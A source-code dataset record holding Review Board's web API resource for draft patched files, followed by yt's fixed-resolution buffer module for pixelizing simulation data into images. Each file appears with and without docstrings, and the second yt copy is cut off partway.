] | null | null | null | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
] | 1 | 2021-11-23T15:25:44.000Z | 2021-11-23T15:25:44.000Z | from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist
from djblets.webapi.errors import DOES_NOT_EXIST
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_patched_file import \
BasePatchedFileResource
class DraftPatchedFileResource(BasePatchedFileResource):
"""Provides the patched file corresponding to a draft file diff."""
name = 'draft_patched_file'
def get_filediff(self, request, *args, **kwargs):
"""Returns the FileDiff, or an error, for the given parameters."""
draft_resource = resources.review_request_draft
try:
draft = draft_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not draft_resource.has_access_permissions(request, draft):
return self._no_access_error(request.user)
try:
return resources.draft_filediff.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
draft_patched_file_resource = DraftPatchedFileResource()
| 34.085714 | 74 | 0.701593 | from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist
from djblets.webapi.errors import DOES_NOT_EXIST
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_patched_file import \
BasePatchedFileResource
class DraftPatchedFileResource(BasePatchedFileResource):
name = 'draft_patched_file'
def get_filediff(self, request, *args, **kwargs):
draft_resource = resources.review_request_draft
try:
draft = draft_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not draft_resource.has_access_permissions(request, draft):
return self._no_access_error(request.user)
try:
return resources.draft_filediff.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
draft_patched_file_resource = DraftPatchedFileResource()
| true | true |
1c3066d4fe4cc6d899f83ad1bb9ca88f7ed8259c | 26,729 | py | Python | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-11-29T21:59:06.000Z | 2021-11-29T21:59:06.000Z | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | null | null | null | """
Fixed resolution buffer support, along with a primitive image analysis tool.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.frontends.ytdata.utilities import \
save_as_dataset
from yt.funcs import \
get_output_filename, \
mylog, \
ensure_list
from .volume_rendering.api import off_axis_projection
from .fixed_resolution_filters import apply_filter, filter_registry
from yt.data_objects.image_array import ImageArray
from yt.utilities.lib.pixelization_routines import \
pixelize_cylinder, pixelize_off_axis_cartesian
from yt.utilities.lib.api import add_points_to_greyscale_image
from yt.frontends.stream.api import load_uniform_grid
import numpy as np
import weakref
import re
import types
class FixedResolutionBuffer(object):
r"""
FixedResolutionBuffer(data_source, bounds, buff_size, antialias = True)
This accepts a 2D data object, such as a Projection or Slice, and
implements a protocol for generating a pixelized, fixed-resolution
image buffer.
yt stores 2D AMR data internally as a set of 2D coordinates and the
half-width of individual pixels. Converting this to an image buffer
requires a deposition step, where individual variable-resolution pixels
are deposited into a buffer of some resolution, to create an image.
This object is an interface to that pixelization step: it can deposit
multiple fields. It acts as a standard YTDataContainer object, such that
dict-style access returns an image of a given field.
Parameters
----------
data_source : :class:`yt.data_objects.construction_data_containers.YTQuadTreeProj` or :class:`yt.data_objects.selection_data_containers.YTSlice`
This is the source to be pixelized, which can be a projection or a
slice. (For cutting planes, see
`yt.visualization.fixed_resolution.ObliqueFixedResolutionBuffer`.)
bounds : sequence of floats
Bounds are the min and max in the image plane that we want our
image to cover. It's in the order of (xmin, xmax, ymin, ymax),
where the coordinates are all in the appropriate code units.
buff_size : sequence of ints
The size of the image to generate.
antialias : boolean
This can be true or false. It determines whether or not sub-pixel
rendering is used during data deposition.
periodic : boolean
This can be true or false, and governs whether the pixelization
will span the domain boundaries.
See Also
--------
:class:`yt.visualization.fixed_resolution.ObliqueFixedResolutionBuffer` : A similar object,
used for cutting
planes.
Examples
--------
To make a projection and then several images, you can generate a
single FRB and then access multiple fields:
>>> proj = ds.proj(0, "density")
>>> frb1 = FixedResolutionBuffer(proj, (0.2, 0.3, 0.4, 0.5),
... (1024, 1024))
>>> print frb1["density"].max()
1.0914e-9 g/cm**3
>>> print frb1["temperature"].max()
104923.1 K
"""
_exclude_fields = ('pz','pdz','dx','x','y','z',
'r', 'dr', 'phi', 'dphi', 'theta', 'dtheta',
('index','dx'),('index','x'),('index','y'),('index','z'),
('index', 'r'), ('index', 'dr'),
('index', 'phi'), ('index', 'dphi'),
('index', 'theta'), ('index', 'dtheta'))
def __init__(self, data_source, bounds, buff_size, antialias = True,
periodic = False):
self.data_source = data_source
self.ds = data_source.ds
self.bounds = bounds
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
self._filters = []
self.axis = data_source.axis
self.periodic = periodic
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
# Handle periodicity, just in case
if self.data_source.axis < 3:
DLE = self.ds.domain_left_edge
DRE = self.ds.domain_right_edge
DD = float(self.periodic)*(DRE - DLE)
axis = self.data_source.axis
xax = self.ds.coordinates.x_axis[axis]
yax = self.ds.coordinates.y_axis[axis]
self._period = (DD[xax], DD[yax])
self._edges = ( (DLE[xax], DRE[xax]), (DLE[yax], DRE[yax]) )
self.setup_filters()
def keys(self):
return self.data.keys()
def __delitem__(self, item):
del self.data[item]
def __getitem__(self, item):
if item in self.data: return self.data[item]
mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
(item, self.buff_size[0], self.buff_size[1]))
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
buff = self.ds.coordinates.pixelize(self.data_source.axis,
self.data_source, item, bounds, self.buff_size,
int(self.antialias))
for name, (args, kwargs) in self._filters:
buff = filter_registry[name](*args[1:], **kwargs).apply(buff)
# Need to add _period and self.periodic
# self._period, int(self.periodic)
ia = ImageArray(buff, input_units=self.data_source[item].units,
info=self._get_info(item))
self.data[item] = ia
return self.data[item]
def __setitem__(self, item, val):
self.data[item] = val
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude and f[0] not in self.data_source.ds.particle_types:
self[f]
def _is_ion( self, fname ):
p = re.compile("_p[0-9]+_")
result = False
if p.search( fname ) is not None:
result = True
return result
def _ion_to_label( self, fname ):
pnum2rom = {
"0":"I", "1":"II", "2":"III", "3":"IV", "4":"V",
"5":"VI", "6":"VII", "7":"VIII", "8":"IX", "9":"X",
"10":"XI", "11":"XII", "12":"XIII", "13":"XIV", "14":"XV",
"15":"XVI", "16":"XVII", "17":"XVIII", "18":"XIX", "19":"XX"}
p = re.compile("_p[0-9]+_")
m = p.search( fname )
if m is not None:
pstr = m.string[m.start()+1:m.end()-1]
segments = fname.split("_")
for i,s in enumerate(segments):
segments[i] = s.capitalize()
if s == pstr:
ipstr = i
element = segments[ipstr-1]
roman = pnum2rom[pstr[1:]]
label = element + '\ ' + roman + '\ ' + \
'\ '.join(segments[ipstr+1:])
else:
label = fname
return label
def _get_info(self, item):
info = {}
ftype, fname = field = self.data_source._determine_fields(item)[0]
finfo = self.data_source.ds._get_field_info(*field)
info['data_source'] = self.data_source.__str__()
info['axis'] = self.data_source.axis
info['field'] = str(item)
info['xlim'] = self.bounds[:2]
info['ylim'] = self.bounds[2:]
info['length_unit'] = self.data_source.ds.length_unit
info['length_to_cm'] = info['length_unit'].in_cgs().to_ndarray()
info['center'] = self.data_source.center
try:
info['coord'] = self.data_source.coord
except AttributeError:
pass
try:
info['weight_field'] = self.data_source.weight_field
except AttributeError:
pass
info['label'] = finfo.display_name
if info['label'] is None:
if self._is_ion( fname ):
fname = self._ion_to_label( fname )
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ')+r'}$'
else:
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ').title()+r'}$'
elif info['label'].find('$') == -1:
info['label'] = info['label'].replace(' ','\ ')
info['label'] = r'$\rm{'+info['label']+r'}$'
return info
def convert_to_pixel(self, coords):
r"""This function converts coordinates in code-space to pixel-space.
Parameters
----------
coords : sequence of array_like
This is (x_coord, y_coord). Because of the way the math is done,
these can both be arrays.
Returns
-------
output : sequence of array_like
This returns px_coord, py_coord
"""
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
px = (coords[0] - self.bounds[0])/dpx
py = (coords[1] - self.bounds[2])/dpy
return (px, py)
def convert_distance_x(self, distance):
r"""This function converts code-space distance into pixel-space
distance in the x-coordiante.
Parameters
----------
distance : array_like
This is x-distance in code-space you would like to convert.
Returns
-------
output : array_like
The return value is the distance in the y-pixel coordinates.
"""
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
return distance/dpx
def convert_distance_y(self, distance):
r"""This function converts code-space distance into pixel-space
distance in the y-coordiante.
Parameters
----------
distance : array_like
This is y-distance in code-space you would like to convert.
Returns
-------
output : array_like
The return value is the distance in the x-pixel coordinates.
"""
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
return distance/dpy
def export_hdf5(self, filename, fields = None):
r"""Export a set of fields to a set of HDF5 datasets.
This function will export any number of fields into datasets in a new
HDF5 file.
Parameters
----------
filename : string
This file will be opened in "append" mode.
fields : list of strings
These fields will be pixelized and output.
"""
import h5py
if fields is None: fields = list(self.data.keys())
output = h5py.File(filename, "a")
for field in fields:
output.create_dataset(field,data=self[field])
output.close()
def export_fits(self, filename, fields=None, clobber=False,
other_keys=None, units="cm"):
r"""Export a set of pixelized fields to a FITS file.
This will export a set of FITS images of either the fields specified
or all the fields already in the object.
Parameters
----------
filename : string
The name of the FITS file to be written.
fields : list of strings
These fields will be pixelized and output. If "None", the keys of the
FRB will be used.
clobber : boolean
If the file exists, this governs whether we will overwrite.
other_keys : dictionary, optional
A set of header keys and values to write into the FITS header.
units : string, optional
the length units that the coordinates are written in, default 'cm'.
"""
from yt.utilities.fits_image import FITSImageData
if fields is None:
fields = list(self.data.keys())
else:
fields = ensure_list(fields)
if len(fields) == 0:
raise RuntimeError(
"No fields to export. Either pass a field or list of fields to "
"export_fits or access a field from the fixed resolution buffer "
"object."
)
fib = FITSImageData(self, fields=fields, units=units)
if other_keys is not None:
for k,v in other_keys.items():
fib.update_all_headers(k,v)
fib.writeto(filename, clobber=clobber)
def export_dataset(self, fields=None, nprocs=1):
r"""Export a set of pixelized fields to an in-memory dataset that can be
analyzed as any other in yt. Unit information and other parameters (e.g.,
geometry, current_time, etc.) will be taken from the parent dataset.
Parameters
----------
fields : list of strings, optional
These fields will be pixelized and output. If "None", the keys of the
FRB will be used.
nprocs: integer, optional
If greater than 1, will create this number of subarrays out of data
Examples
--------
>>> import yt
>>> ds = yt.load("GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0150")
>>> slc = ds.slice(2, 0.0)
>>> frb = slc.to_frb((500.,"kpc"), 500)
>>> ds2 = frb.export_dataset(fields=["density","temperature"], nprocs=32)
"""
nx, ny = self.buff_size
data = {}
if fields is None:
fields = list(self.keys())
for field in fields:
arr = self[field]
data[field] = (arr.d.T.reshape(nx,ny,1), str(arr.units))
bounds = [b.in_units("code_length").v for b in self.bounds]
bbox = np.array([[bounds[0],bounds[1]],[bounds[2],bounds[3]],[0.,1.]])
return load_uniform_grid(data, [nx,ny,1],
length_unit=self.ds.length_unit,
bbox=bbox,
sim_time=self.ds.current_time.in_units("s").v,
mass_unit=self.ds.mass_unit,
time_unit=self.ds.time_unit,
velocity_unit=self.ds.velocity_unit,
magnetic_unit=self.ds.magnetic_unit,
periodicity=(False,False,False),
geometry=self.ds.geometry,
nprocs=nprocs)
def save_as_dataset(self, filename=None, fields=None):
r"""Export a fixed resolution buffer to a reloadable yt dataset.
This function will take a fixed resolution buffer and output a
dataset containing either the fields presently existing or fields
given in the ``fields`` list. The resulting dataset can be
reloaded as a yt dataset.
Parameters
----------
filename : str, optional
The name of the file to be written. If None, the name
will be a combination of the original dataset and the type
of data container.
fields : list of strings or tuples, optional
If this is supplied, it is the list of fields to be saved to
disk. If not supplied, all the fields that have been queried
will be saved.
Returns
-------
filename : str
The name of the file that has been created.
Examples
--------
>>> import yt
>>> ds = yt.load("enzo_tiny_cosmology/DD0046/DD0046")
>>> proj = ds.proj("density", "x", weight_field="density")
>>> frb = proj.to_frb(1.0, (800, 800))
>>> fn = frb.save_as_dataset(fields=["density"])
>>> ds2 = yt.load(fn)
>>> print (ds2.data["density"])
[[ 1.25025353e-30 1.25025353e-30 1.25025353e-30 ..., 7.90820691e-31
7.90820691e-31 7.90820691e-31]
[ 1.25025353e-30 1.25025353e-30 1.25025353e-30 ..., 7.90820691e-31
7.90820691e-31 7.90820691e-31]
[ 1.25025353e-30 1.25025353e-30 1.25025353e-30 ..., 7.90820691e-31
7.90820691e-31 7.90820691e-31]
...,
[ 1.55834239e-30 1.55834239e-30 1.55834239e-30 ..., 8.51353199e-31
8.51353199e-31 8.51353199e-31]
[ 1.55834239e-30 1.55834239e-30 1.55834239e-30 ..., 8.51353199e-31
8.51353199e-31 8.51353199e-31]
[ 1.55834239e-30 1.55834239e-30 1.55834239e-30 ..., 8.51353199e-31
8.51353199e-31 8.51353199e-31]] g/cm**3
"""
keyword = "%s_%s_frb" % (str(self.ds), self.data_source._type_name)
filename = get_output_filename(filename, keyword, ".h5")
data = {}
if fields is not None:
for f in self.data_source._determine_fields(fields):
data[f] = self[f]
else:
data.update(self.data)
ftypes = dict([(field, "grid") for field in data])
extra_attrs = dict([(arg, getattr(self.data_source, arg, None))
for arg in self.data_source._con_args +
self.data_source._tds_attrs])
extra_attrs["con_args"] = self.data_source._con_args
extra_attrs["left_edge"] = self.ds.arr([self.bounds[0],
self.bounds[2]])
extra_attrs["right_edge"] = self.ds.arr([self.bounds[1],
self.bounds[3]])
extra_attrs["ActiveDimensions"] = self.buff_size
extra_attrs["level"] = 0
extra_attrs["data_type"] = "yt_frb"
extra_attrs["container_type"] = self.data_source._type_name
extra_attrs["dimensionality"] = self.data_source._dimensionality
save_as_dataset(self.ds, filename, data, field_types=ftypes,
extra_attrs=extra_attrs)
return filename
@property
def limits(self):
rv = dict(x = None, y = None, z = None)
xax = self.ds.coordinates.x_axis[self.axis]
yax = self.ds.coordinates.y_axis[self.axis]
xn = self.ds.coordinates.axis_name[xax]
yn = self.ds.coordinates.axis_name[yax]
rv[xn] = (self.bounds[0], self.bounds[1])
rv[yn] = (self.bounds[2], self.bounds[3])
return rv
def setup_filters(self):
ignored = ['FixedResolutionBufferFilter']
for key in filter_registry:
if key in ignored:
continue
filtername = filter_registry[key]._filter_name
FilterMaker = filter_registry[key]
filt = apply_filter(FilterMaker)
filt.__doc__ = FilterMaker.__doc__
self.__dict__['apply_' + filtername] = \
types.MethodType(filt, self)
class CylindricalFixedResolutionBuffer(FixedResolutionBuffer):
"""
This object is a subclass of
:class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
that supports non-aligned input data objects, primarily cutting planes.
"""
def __init__(self, data_source, radius, buff_size, antialias = True) :
self.data_source = data_source
self.ds = data_source.ds
self.radius = radius
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
def __getitem__(self, item) :
if item in self.data: return self.data[item]
buff = pixelize_cylinder(self.data_source["r"], self.data_source["dr"],
self.data_source["theta"], self.data_source["dtheta"],
self.buff_size, self.data_source[item].astype("float64"),
self.radius)
self[item] = buff
return buff
class ObliqueFixedResolutionBuffer(FixedResolutionBuffer):
"""
This object is a subclass of
:class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
that supports non-aligned input data objects, primarily cutting planes.
"""
def __getitem__(self, item):
if item in self.data: return self.data[item]
indices = np.argsort(self.data_source['dx'])[::-1]
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
buff = pixelize_off_axis_cartesian(
self.data_source['x'], self.data_source['y'], self.data_source['z'],
self.data_source['px'], self.data_source['py'],
self.data_source['pdx'], self.data_source['pdy'], self.data_source['pdz'],
self.data_source.center, self.data_source._inv_mat, indices,
self.data_source[item],
self.buff_size[0], self.buff_size[1],
bounds).transpose()
ia = ImageArray(buff, input_units=self.data_source[item].units,
info=self._get_info(item))
self[item] = ia
return ia
class OffAxisProjectionFixedResolutionBuffer(FixedResolutionBuffer):
"""
This object is a subclass of
:class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
that supports off axis projections. This calls the volume renderer.
"""
def __init__(self, data_source, bounds, buff_size, antialias = True,
periodic = False):
self.data = {}
FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size, antialias, periodic)
def __getitem__(self, item):
if item in self.data: return self.data[item]
mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
(item, self.buff_size[0], self.buff_size[1]))
dd = self.data_source
width = self.ds.arr((self.bounds[1] - self.bounds[0],
self.bounds[3] - self.bounds[2],
self.bounds[5] - self.bounds[4]))
buff = off_axis_projection(dd.dd, dd.center, dd.normal_vector,
width, dd.resolution, item,
weight=dd.weight_field, volume=dd.volume,
no_ghost=dd.no_ghost,
interpolated=dd.interpolated,
north_vector=dd.north_vector,
method=dd.method)
ia = ImageArray(buff.swapaxes(0,1), info=self._get_info(item))
self[item] = ia
return ia
class ParticleImageBuffer(FixedResolutionBuffer):
"""
This object is a subclass of
:class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
that supports particle plots. It splats points onto an image
buffer.
"""
def __init__(self, data_source, bounds, buff_size, antialias=True,
periodic=False):
self.data = {}
FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size,
antialias, periodic)
# set up the axis field names
axis = self.axis
xax = self.ds.coordinates.x_axis[axis]
yax = self.ds.coordinates.y_axis[axis]
ax_field_template = 'particle_position_%s'
self.x_field = ax_field_template % self.ds.coordinates.axis_name[xax]
self.y_field = ax_field_template % self.ds.coordinates.axis_name[yax]
def __getitem__(self, item):
if item in self.data:
return self.data[item]
mylog.info("Splatting (%s) onto a %d by %d mesh" %
(item, self.buff_size[0], self.buff_size[1]))
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
ftype = item[0]
x_data = self.data_source.dd[ftype, self.x_field]
y_data = self.data_source.dd[ftype, self.y_field]
data = self.data_source.dd[item]
# convert to pixels
px = (x_data - self.bounds[0]) / (self.bounds[1] - self.bounds[0])
py = (y_data - self.bounds[2]) / (self.bounds[3] - self.bounds[2])
# select only the particles that will actually show up in the image
mask = np.logical_and(np.logical_and(px >= 0.0, px <= 1.0),
np.logical_and(py >= 0.0, py <= 1.0))
weight_field = self.data_source.weight_field
if weight_field is None:
weight_data = np.ones_like(data.v)
else:
weight_data = self.data_source.dd[weight_field]
splat_vals = weight_data[mask]*data[mask]
# splat particles
buff = np.zeros(self.buff_size)
add_points_to_greyscale_image(buff,
px[mask],
py[mask],
splat_vals)
ia = ImageArray(buff, input_units=data.units,
info=self._get_info(item))
# divide by the weight_field, if needed
if weight_field is not None:
weight_buff = np.zeros(self.buff_size)
add_points_to_greyscale_image(weight_buff,
px[mask],
py[mask],
weight_data[mask])
weight_array = ImageArray(weight_buff,
input_units=weight_data.units,
info=self._get_info(item))
locs = np.where(weight_array > 0)
ia[locs] /= weight_array[locs]
self.data[item] = ia
return self.data[item]
# over-ride the base class version, since we don't want to exclude
# particle fields
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude:
self[f]
| 39.598519 | 148 | 0.564331 |
from yt.frontends.ytdata.utilities import \
save_as_dataset
from yt.funcs import \
get_output_filename, \
mylog, \
ensure_list
from .volume_rendering.api import off_axis_projection
from .fixed_resolution_filters import apply_filter, filter_registry
from yt.data_objects.image_array import ImageArray
from yt.utilities.lib.pixelization_routines import \
pixelize_cylinder, pixelize_off_axis_cartesian
from yt.utilities.lib.api import add_points_to_greyscale_image
from yt.frontends.stream.api import load_uniform_grid
import numpy as np
import weakref
import re
import types
class FixedResolutionBuffer(object):
_exclude_fields = ('pz','pdz','dx','x','y','z',
'r', 'dr', 'phi', 'dphi', 'theta', 'dtheta',
('index','dx'),('index','x'),('index','y'),('index','z'),
('index', 'r'), ('index', 'dr'),
('index', 'phi'), ('index', 'dphi'),
('index', 'theta'), ('index', 'dtheta'))
def __init__(self, data_source, bounds, buff_size, antialias = True,
periodic = False):
self.data_source = data_source
self.ds = data_source.ds
self.bounds = bounds
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
self._filters = []
self.axis = data_source.axis
self.periodic = periodic
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
if self.data_source.axis < 3:
DLE = self.ds.domain_left_edge
DRE = self.ds.domain_right_edge
DD = float(self.periodic)*(DRE - DLE)
axis = self.data_source.axis
xax = self.ds.coordinates.x_axis[axis]
yax = self.ds.coordinates.y_axis[axis]
self._period = (DD[xax], DD[yax])
self._edges = ( (DLE[xax], DRE[xax]), (DLE[yax], DRE[yax]) )
self.setup_filters()
def keys(self):
return self.data.keys()
def __delitem__(self, item):
del self.data[item]
def __getitem__(self, item):
if item in self.data: return self.data[item]
mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
(item, self.buff_size[0], self.buff_size[1]))
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
buff = self.ds.coordinates.pixelize(self.data_source.axis,
self.data_source, item, bounds, self.buff_size,
int(self.antialias))
for name, (args, kwargs) in self._filters:
buff = filter_registry[name](*args[1:], **kwargs).apply(buff)
ia = ImageArray(buff, input_units=self.data_source[item].units,
info=self._get_info(item))
self.data[item] = ia
return self.data[item]
def __setitem__(self, item, val):
self.data[item] = val
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude and f[0] not in self.data_source.ds.particle_types:
self[f]
def _is_ion( self, fname ):
p = re.compile("_p[0-9]+_")
result = False
if p.search( fname ) is not None:
result = True
return result
def _ion_to_label( self, fname ):
pnum2rom = {
"0":"I", "1":"II", "2":"III", "3":"IV", "4":"V",
"5":"VI", "6":"VII", "7":"VIII", "8":"IX", "9":"X",
"10":"XI", "11":"XII", "12":"XIII", "13":"XIV", "14":"XV",
"15":"XVI", "16":"XVII", "17":"XVIII", "18":"XIX", "19":"XX"}
p = re.compile("_p[0-9]+_")
m = p.search( fname )
if m is not None:
pstr = m.string[m.start()+1:m.end()-1]
segments = fname.split("_")
for i,s in enumerate(segments):
segments[i] = s.capitalize()
if s == pstr:
ipstr = i
element = segments[ipstr-1]
roman = pnum2rom[pstr[1:]]
label = element + '\ ' + roman + '\ ' + \
'\ '.join(segments[ipstr+1:])
else:
label = fname
return label
def _get_info(self, item):
info = {}
ftype, fname = field = self.data_source._determine_fields(item)[0]
finfo = self.data_source.ds._get_field_info(*field)
info['data_source'] = self.data_source.__str__()
info['axis'] = self.data_source.axis
info['field'] = str(item)
info['xlim'] = self.bounds[:2]
info['ylim'] = self.bounds[2:]
info['length_unit'] = self.data_source.ds.length_unit
info['length_to_cm'] = info['length_unit'].in_cgs().to_ndarray()
info['center'] = self.data_source.center
try:
info['coord'] = self.data_source.coord
except AttributeError:
pass
try:
info['weight_field'] = self.data_source.weight_field
except AttributeError:
pass
info['label'] = finfo.display_name
if info['label'] is None:
if self._is_ion( fname ):
fname = self._ion_to_label( fname )
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ')+r'}$'
else:
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ').title()+r'}$'
elif info['label'].find('$') == -1:
info['label'] = info['label'].replace(' ','\ ')
info['label'] = r'$\rm{'+info['label']+r'}$'
return info
def convert_to_pixel(self, coords):
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
px = (coords[0] - self.bounds[0])/dpx
py = (coords[1] - self.bounds[2])/dpy
return (px, py)
def convert_distance_x(self, distance):
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
return distance/dpx
def convert_distance_y(self, distance):
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
return distance/dpy
def export_hdf5(self, filename, fields = None):
import h5py
if fields is None: fields = list(self.data.keys())
output = h5py.File(filename, "a")
for field in fields:
output.create_dataset(field,data=self[field])
output.close()
def export_fits(self, filename, fields=None, clobber=False,
other_keys=None, units="cm"):
from yt.utilities.fits_image import FITSImageData
if fields is None:
fields = list(self.data.keys())
else:
fields = ensure_list(fields)
if len(fields) == 0:
raise RuntimeError(
"No fields to export. Either pass a field or list of fields to "
"export_fits or access a field from the fixed resolution buffer "
"object."
)
fib = FITSImageData(self, fields=fields, units=units)
if other_keys is not None:
for k,v in other_keys.items():
fib.update_all_headers(k,v)
fib.writeto(filename, clobber=clobber)
def export_dataset(self, fields=None, nprocs=1):
nx, ny = self.buff_size
data = {}
if fields is None:
fields = list(self.keys())
for field in fields:
arr = self[field]
data[field] = (arr.d.T.reshape(nx,ny,1), str(arr.units))
bounds = [b.in_units("code_length").v for b in self.bounds]
bbox = np.array([[bounds[0],bounds[1]],[bounds[2],bounds[3]],[0.,1.]])
return load_uniform_grid(data, [nx,ny,1],
length_unit=self.ds.length_unit,
bbox=bbox,
sim_time=self.ds.current_time.in_units("s").v,
mass_unit=self.ds.mass_unit,
time_unit=self.ds.time_unit,
velocity_unit=self.ds.velocity_unit,
magnetic_unit=self.ds.magnetic_unit,
periodicity=(False,False,False),
geometry=self.ds.geometry,
nprocs=nprocs)
def save_as_dataset(self, filename=None, fields=None):
keyword = "%s_%s_frb" % (str(self.ds), self.data_source._type_name)
filename = get_output_filename(filename, keyword, ".h5")
data = {}
if fields is not None:
for f in self.data_source._determine_fields(fields):
data[f] = self[f]
else:
data.update(self.data)
ftypes = dict([(field, "grid") for field in data])
extra_attrs = dict([(arg, getattr(self.data_source, arg, None))
for arg in self.data_source._con_args +
self.data_source._tds_attrs])
extra_attrs["con_args"] = self.data_source._con_args
extra_attrs["left_edge"] = self.ds.arr([self.bounds[0],
self.bounds[2]])
extra_attrs["right_edge"] = self.ds.arr([self.bounds[1],
self.bounds[3]])
extra_attrs["ActiveDimensions"] = self.buff_size
extra_attrs["level"] = 0
extra_attrs["data_type"] = "yt_frb"
extra_attrs["container_type"] = self.data_source._type_name
extra_attrs["dimensionality"] = self.data_source._dimensionality
save_as_dataset(self.ds, filename, data, field_types=ftypes,
extra_attrs=extra_attrs)
return filename
@property
def limits(self):
rv = dict(x = None, y = None, z = None)
xax = self.ds.coordinates.x_axis[self.axis]
yax = self.ds.coordinates.y_axis[self.axis]
xn = self.ds.coordinates.axis_name[xax]
yn = self.ds.coordinates.axis_name[yax]
rv[xn] = (self.bounds[0], self.bounds[1])
rv[yn] = (self.bounds[2], self.bounds[3])
return rv
def setup_filters(self):
ignored = ['FixedResolutionBufferFilter']
for key in filter_registry:
if key in ignored:
continue
filtername = filter_registry[key]._filter_name
FilterMaker = filter_registry[key]
filt = apply_filter(FilterMaker)
filt.__doc__ = FilterMaker.__doc__
self.__dict__['apply_' + filtername] = \
types.MethodType(filt, self)
class CylindricalFixedResolutionBuffer(FixedResolutionBuffer):
def __init__(self, data_source, radius, buff_size, antialias = True) :
self.data_source = data_source
self.ds = data_source.ds
self.radius = radius
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
def __getitem__(self, item) :
if item in self.data: return self.data[item]
buff = pixelize_cylinder(self.data_source["r"], self.data_source["dr"],
self.data_source["theta"], self.data_source["dtheta"],
self.buff_size, self.data_source[item].astype("float64"),
self.radius)
self[item] = buff
return buff
class ObliqueFixedResolutionBuffer(FixedResolutionBuffer):
def __getitem__(self, item):
if item in self.data: return self.data[item]
indices = np.argsort(self.data_source['dx'])[::-1]
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
buff = pixelize_off_axis_cartesian(
self.data_source['x'], self.data_source['y'], self.data_source['z'],
self.data_source['px'], self.data_source['py'],
self.data_source['pdx'], self.data_source['pdy'], self.data_source['pdz'],
self.data_source.center, self.data_source._inv_mat, indices,
self.data_source[item],
self.buff_size[0], self.buff_size[1],
bounds).transpose()
ia = ImageArray(buff, input_units=self.data_source[item].units,
info=self._get_info(item))
self[item] = ia
return ia
class OffAxisProjectionFixedResolutionBuffer(FixedResolutionBuffer):
def __init__(self, data_source, bounds, buff_size, antialias = True,
periodic = False):
self.data = {}
FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size, antialias, periodic)
